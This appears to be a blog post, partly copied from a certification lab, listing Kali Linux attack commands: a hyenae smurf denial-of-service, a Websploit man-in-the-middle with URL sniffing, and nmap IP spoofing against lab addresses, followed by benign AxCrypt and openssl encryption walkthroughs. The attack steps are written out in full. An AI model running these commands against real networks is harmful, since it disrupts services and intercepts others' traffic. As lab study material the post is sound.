This is a list of some useful attacks I’ve seen executed from Kali Linux. I’ll include pictures at a later time, but this should be more than enough to get you started. Please use for educational purposes only!
1 . Conduct DOS using smurf attack
hyenae -I 1 -A 4 -a icmp-echo -s %-% -d %-192.168.137.7 -t 128
2. MITM with Websploit
- su –
- Websploit
- show modules
- use network/mitm
- show options
- set interface eth0
- set router 192.168.137.1
- set target 192.168.137.7
- set sniffer urlsnarf
- run
3. IP Spoofing
- From the desktop, open Wireshark.
- Select vEthernet (Switch1) and click the Start button to capture packets.
- From the desktop, open Linux.vnc and provide Password: ucertify.
- Click OK.
- From the left sidebar, open the Terminal window.
- Execute the following commands in the Terminal window to conduct IP spoofing using nmap.
Note: Enter one command at a time and enter the password as ucertify.
Copy - nmap -iflist
- sudo nmap -e eth0 -S 192.168.137.1 192.168.137.14
- Go to Wireshark, click the Stop button and wait for sometime till the packets will appear.
- Apply the display filter as arp. View the Info section for Destination Broadcast.
- In the main menu navigate to File > Save As.. and in the File Name text box type ip_spoof.
- Click the Save button to save the captured packet in the default location.
- Close all the windows.
4. Encrypt Files on Windows
- From desktop, open Lab Files.
- Right-click in the Lab Files window and navigate to New > Folder, rename it Symmetric.
- Symmetric Algorithm encrypts and decrypts the information using the same secret key. You will encrypt a file using the AxCrypt open-source encryption algorithm, which uses the AES algorithm with 128-bit keys.
- In the taskbar, type Notepad in the search bar to open Notepad and then type the following text in it:
This is an example of Symmetric Algorithm. - In the main menu, click File and select the Save As… option. Navigate to Desktop > Lab Files > Symmetric folder and type File name as symmetric_file.txt and then click Save.Open Google Chrome browser, enter https://account.axcrypt.net/en/Home/Register in the address bar and press the Enter key to register yourself with your email id.
- From the Lab Files, double-click the AxCrypt-2.1.1547.0-Setup.exe file to open it.
Note: In the appeared Open File- Security Warning dialogue box, click Run. - Proceed through the wizard to complete the installation, then click on the Launch button.
- At the AxCrypt ID prompt, type your <Email ID> and click OK.
- In the Verify AxCrypt ID dialog box, type Verification Code, Set Your Password, and Verify Password and click OK.
Note: You will receive the verification code in your email that you have entered in step 8. Use that verification code in this step to proceed further. - At the Getting started with AxCrypt prompt, click OK.
- At the How do you want to open this prompt, click OK.
- A browser window will open.
- Close all the browser windows.
- At the Warning prompt, check the I will not forget my password! checkbox and click OK.
- At the AxCrypt ID Sign In prompt, type your password and click OK.
- At the first Information prompt, click Cancel.
- At the second Information prompt, click OK.
- Click the + sign in the menu, navigate to Desktop > Lab Files > Symmetric folder and select the file symmetric_file.txt, the file will be encrypted. In the File explorer, you will notice that the file name has changed to symmetric_file-txt.axx.
- Open the symmetric_file-txt.axx file in Notepad, notice that the contents are unreadable.
- Right-click symmetric_file-txt.axx file and navigate to AxCrypt > Decrypt, accept any default information.
- Notice that the symmetric_file-txt.axx file reappears as symmetric_file.txt. View the content of the file.
- Close all the windows.
5. Encrypt Files on Linux
- cat Documents/asym.txt
- Execute the following command to generate the private key:
Copy
openssl genrsa -out private_key.pem 1024 - Execute the following command to generate the public key so that private and public key can form a pair:
Copy
openssl rsa -in private_key.pem -out public_key.pem -outform PEM -pubout - Execute the following command to encrypt data. Here we will encrypt the file asym.txt and store the encrypted text in the file encrypt.dat:
Copy
openssl rsautl -encrypt -inkey public_key.pem -pubin -in Documents/asym.txt -out encrypt.dat - Execute the following command to use the following command to view the encrypt.dat file:
Copy
cat encrypt.dat - Execute the following command to use the private key to decrypt the file. Here we will encrypt the file encrypt.dat and store the encrypted text in the file decrypt.txt:
Copy
openssl rsautl -decrypt -inkey private_key.pem -in encrypt.dat -out decrypt.txt - Execute the following command to view the decrypt.txt file. You will see the original content:
Copy cat decrypt.txt